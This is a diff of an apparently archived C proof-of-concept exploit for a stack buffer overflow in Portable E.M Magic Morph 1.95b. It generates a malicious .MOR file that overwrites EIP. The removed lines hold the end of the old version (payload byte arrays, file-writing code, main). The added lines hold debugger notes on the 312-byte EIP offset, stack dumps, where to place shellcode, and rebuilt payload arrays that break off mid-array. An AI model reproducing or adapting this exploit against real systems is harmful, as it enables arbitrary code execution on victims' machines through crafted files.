-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
-    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
-    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
-    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
-    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
-    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
-    0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 
-    0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, 
-    0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, 
-    0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, 
-   };
-   
-   uint8_t hexfileP2[] = {
-    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
-    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
-    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    };
-    
-    uint8_t hexfileP3[] = {
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
-    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 
-    0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 
-    0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 
-    0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, 
-    0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
-} ;   
-   FILE *f;
-   f = fopen(fname ,"wb");
-   F *Gf;
-   Gf = (F*)malloc(sizeof(F));
-   Gf->a = 0x43;
-   Gf->b = 0x3A;
-   Gf->c = 0x5C;
-   uint8_t B[100];
-   memcpy(B, Gf, sizeof(Gf));
-   fwrite(B, sizeof(uint8_t), 3, f);
-   fwrite(hexfileP1, sizeof(uint8_t), sizeof(hexfileP1), f);
-   fwrite(hexfileP2, sizeof(uint8_t), sizeof(hexfileP2), f);
-   fwrite(hexfileP3, sizeof(uint8_t), sizeof(hexfileP3), f);
-   fclose(f);
-      }
-   void args(int argc, char *argv[])
-    { 
-    int file;
-    int a;
-    if(a) 
-    while((a = getopt(argc, argv, "f")) != EOF) {
-    switch(a)                                     {
-    case 'f':
-    file = (int)optarg;
-    break;
-    default:
-    exit(-1);
-                                                   }
-  						                           }
-                                                   }   
-    void Usage (char *Name)
-   { system("CLS");
-         printf("*********************************************************************\n");
-      fprintf ( stdout , "\t\tPortable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC\n");
-     printf("The usage is:\n");
-    
-     fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
-         }   
-     void Menu()
-   { fprintf(stderr,
-    "\n"
-    "\t-f       FILE.mor\n"
-    "*********************************************************************"
-    "\n");
-   }         
-   
-  int main(int32_t argc , char *argv[])
-  {  if(argc < 2) {
-      Usage(argv[0]);             
-     Menu();             
-    
-     exit(-1);
-                  }  
-     char b[100];                  
-     strcpy(b, argv[2]);
-     strcat(b, ".mor");                 
-     buildFile(b);
-     printf("File DONE !\n");
-     return 0;
-      }      
- //END Algorithm
-
-/ milw0rm.com [2009-09-14]
+   /*********************************************************************
+    Portable E.M Magic Morph 1.95b .MOR File Stack Buffer Overflow POC  *
+    By fl0 fl0w                                                         *
+    "can't stop me/my time is now/your time is up/MY TIME IS NOW !!!!"  *                               
+   **********************************************************************             
+   
+
+  /********************************************************************************************************
+   The EIP offset is at 312 bytes 0x138 HEX                                                               *  
+   After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start  *   
+   of the file, and you'll have to rezult with 0x138 bytes                                                *
+                                                                                                          *
+   I used a technique names "stack spray" to determine the offset.                                        *
+                                                                                                          * 
+   CPU REGISTERS                                                                                          *  
+   EAX 00000000                                                                                           *
+   ECX 33333333                                                                                           *
+   EDX 01492288                                                                                           *
+   EBX 00000001                                                                                           *
+                                                                                                          *
+   ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   *
+   ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY       *
+   XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223                                             *
+   EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY   *
+   YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b   *
+   bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa                                                 *
+                                                                                                          * 
+   ESI 00F369B0                                                                                           *
+   EDI 00F369B0                                                                                           *
+   EIP 41414141                                                                                           *
+                                                                                                          * 
+   We control ECX, EIP witch is more than enought to copy what addresess you want in the memory.          *
+   So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption*
+   starts at a much lower address.                                                                        *
+   This is what ESP points to:                                                                            *
+   ******************************************************************************************************** 
+  */ 
+   
+   /************************
+     STACK                 * 
+     0012EF7C   62343434   *                                                                               
+     0012EF80   62626262   *
+     0012EF84   62626262   *
+     0012EF88   67676262   *
+     0012EF8C   67676767   *
+     0012EF90   67676767   *
+     0012EF94   67676767   *
+     0012EF98   62676767   *
+     0012EF9C   61616161   *
+     0012EFA0   61616161   *
+     0012EFA4   61616161   *
+     0012EFA8   61616161   *
+     0012EFAC   61616161   *
+     0012EFB0   61616161   * 
+     0012EFB4   61616161   * 
+     0012EFB8   61616161   *
+     0012EFBC   61616161   *
+     0012EFC0   61616161   *
+     0012EFC4   61616161   *
+     0012EFC8   61616161   *
+     0012EFCC   60606060   *
+     0012EFD0   60606060   *
+     0012EFD4   60606060   *
+     0012EFD8   60606060   *
+     0012EFDC   60606060   *
+     0012EFE0   60606060   *
+     0012EFE4   60606060   *
+     0012EFE8   60606060   *  
+     0012EFF0   60606060   *
+     0012EFF4   60606060   *
+     0012EFF8   60606060   *
+     0012EFFC   59595959   *
+     0012F000   59595959   *
+     0012F004   59595959   *
+     0012F008   59595959   *
+     0012F00C   59595959   *
+     ..................... *
+     ***********************
+*/
+
+
+/*************************************************
+You can copy your shellcode starting from here : *
+    0012EC3C   63636363                          *
+                                                 * 
+ 0x12EF80 = 1240960 ->NOT-> A                    * 
+                                                 * 
+ 0x12EC3C = 1240124 ->NOT-> B                    * 
+                                                 *
+ A > B                                           * 
+ A - B = 836 = 0x344                             *  
+ So the stack gets corrupted a long way from ESP.*
+ *************************************************
+ */
+ 
+ 
+
+  /************************************************* 
+   LOOK OF THE DUMP                                * 
+   0012EE4C              63 63 63 63      cccc     *
+   0012EE54  63 63 63 63 63 63 63 63  cccccccc     *
+   0012EE5C  32 32 32 32 32 32 32 32  22222222     *
+   0012EE64  32 33 33 33 33 33 33 33  23333333     *
+   0012EE6C  33 33 33 66 66 66 66 66  333fffff     *
+   0012EE74  41 41 41 41 77 77 34 34  AAAAww44     *
+   0012EE7C  34 34 34 62 62 62 62 62  444bbbbb     *
+   0012EE84  62 62 62 62 62 62 67 67  bbbbbbgg     *
+   0012EE8C  67 67 67 67 67 67 67 67  gggggggg     *
+   0012EE94  67 67 67 67 67 67 67 62  gggggggb     *
+   0012EE9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EEA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EEAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EEB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EEBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EEC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EECC  60 60 60 60 60 60 60 60  ````````     *
+   0012EED4  60 60 60 60 60 60 60 60  ````````     *
+   0012EEDC  60 60 60 60 60 60 60 60  ````````     *
+   0012EEE4  60 60 60 60 60 60 60 60  ````````     *
+   0012EEEC  60 60 60 60 60 60 60 60  ````````     *
+   0012EEF4  60 60 60 60 60 60 60 60  ````````     *
+   0012EEFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF04  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF0C  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF14  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF1C  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF24  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012EF2C  58 58 58 58 58 58 58 58  XXXXXXXX     *
+   0012EF34  58 58 58 58 58 58 58 58  XXXXXXXX     *
+   0012EF3C  63 63 63 63 63 63 63 63  cccccccc     *
+   0012EF44  63 63 63 63 63 63 63 63  cccccccc     *
+   0012EF4C  63 63 63 63 63 63 63 63  cccccccc     *
+   0012EF54  63 63 63 63 63 63 63 63  cccccccc     *
+   0012EF5C  32 32 32 32 32 32 32 32  22222222     *
+   0012EF64  32 33 33 33 33 33 33 33  23333333     *
+   0012EF6C  33 33 33 66 66 66 66 66  333fffff     *
+   0012EF74  41 41 41 41 77 77 34 34  AAAAww44     *
+   0012EF7C  34 34 34 62 62 62 62 62  444bbbbb     *
+   0012EF84  62 62 62 62 62 62 67 67  bbbbbbgg     *
+   0012EF8C  67 67 67 67 67 67 67 67  gggggggg     *
+   0012EF94  67 67 67 67 67 67 67 62  gggggggb     *
+   0012EF9C  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFA4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFAC  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFB4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFBC  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFC4  61 61 61 61 61 61 61 61  aaaaaaaa     *
+   0012EFCC  60 60 60 60 60 60 60 60  ````````     *
+   0012EFD4  60 60 60 60 60 60 60 60  ````````     *
+   0012EFDC  60 60 60 60 60 60 60 60  ````````     *
+   0012EFE4  60 60 60 60 60 60 60 60  ````````     *
+   0012EFEC  60 60 60 60 60 60 60 60  ````````     *
+   0012EFF4  60 60 60 60 60 60 60 60  ````````     *
+   0012EFFC  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012F004  59 59 59 59 59 59 59 59  YYYYYYYY     *
+   0012F00C  59 59 59 59 59 59 59 59  YYYYYYYY     *
+  *************************************************
+  */ 
+  
+  /**************************************************************************************
+    Hello to all my buddies from insecurity.ro ,skullbox.info ,renslt.org               * 
+    Special greetz to OSHO,!_30,str0ke,Carcabot.                                                 *  
+    Vizite my website for more bugs ,papers, exploits, pocs and programming techniques. *
+    http://www.sploitz.10001mb.com                                                      *
+  *************************************************************************************
+  */
+  
+  /*************************************************************************
+  DEMO                                                                     *            
+  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe           *
+  *********************************************************************    *
+                Magic Morph .MOR File Stack Buffer Overflow POC            * 
+  The usage is:                                                            *  
+                All Credits fl0 fl0w                                       *   
+                                                                           *    
+        -f       FILE.mor                                                  *     
+  ************************************************************************** 
+                                                                           *      
+  C:\Documents and Settings\Stefan\Desktop\magic moth poc>mm.exe -f TEST   *
+  File DONE !                                                              *
+  **************************************************************************
+  */
+  
+  /*****************************************************************************************
+  Technicall details                                                                       * 
+  This program was compiled with DEV-Cpp and tested with success on MS Windows Xp Sp3      *
+  You can download the POC allong with debugging details from my website                   *
+  
+  Preview ...                                                                              * 
+  ......                                                                                   *  
+  This folder contains two screenshots from the ollydbg debbugging session, the poc(MM.CPP)* 
+  and the software Portable E.M Magic Morph 1.95b.                                                                        *   
+  ALL CREDITS GO TO fl0 fl0w for this exploit !                                            *
+  http://www.sploitz.10001mb.com/                                                          * 
+   ...........................                                                             *  
+  ******************************************************************************************   
+  */
+  //START Algorithm
+ #include "stdio.h"
+ #include "string.h"
+ #include "stdlib.h"
+ #include "windows.h"
+ #include "stdint.h"
+ #include "getopt.h"
+ typedef struct flo {
+ uint8_t a;
+ uint8_t b;
+ uint8_t c;
+         }F;
+         
+  
+
+ void buildFile(char *fname)
+ { 
+   uint8_t hexfileP1[] =
+{
+    0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x20, 0x61, 0x6E, 0x64, 
+    0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 0x65, 0x66, 0x61, 0x6E, 
+    0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x5C, 0x4D, 0x73, 
+    0x20, 0x73, 0x75, 0x70, 0x72, 0x65, 0x6D, 0x63, 0x79, 0x30, 0x30, 0x30, 0x2E, 0x6A, 0x70, 0x67, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
+    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
+    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 
+    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
+    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
+    0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 
+    0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x32, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 
+    0x33, 0x33, 0x33, 0x66, 0x66, 0x66, 0x66, 0x66, 0x41, 0x41, 0x41, 0x41, 0x77, 0x77, 0x34, 0x34, 
+    0x34, 0x34, 0x34, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x62, 0x67, 0x67, 
+    0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x67, 0x62, 
+   };
+   
+   uint8_t hexfileP2[] = {
+    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+    0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
+    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
+    0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    };
+    
+    uint8_t hexfileP3[] = {
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 
+    0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x56, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x43, 0x3A, 0x5C, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 0x73, 
+    0x20, 0x61, 0x6E, 0x64, 0x20, 0x53, 0x65, 0x74, 0x74, 0x69, 0x6E, 0x67, 0x73, 0x5C, 0x53, 0x74, 
+    0x65, 0x66, 0x61, 0x6E, 0x5C, 0x4D, 0x79, 0x20, 0x44, 0x6F, 0x63, 0x75, 0x6D, 0x65, 0x6E, 0x74, 
+    0x73, 0x5C, 0x72, 0x6F, 0x6E, 0x61, 0x6C, 0x64, 0x6F, 0x2D, 0x62, 0x72, 0x61, 0x7A, 0x69, 0x6C, 
+    0x2D, 0x77, 0x61, 0x6C, 0x6C, 0x70, 0x61, 0x70, 0x65, 0x72, 0x2E, 0x6A, 0x70, 0x67, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
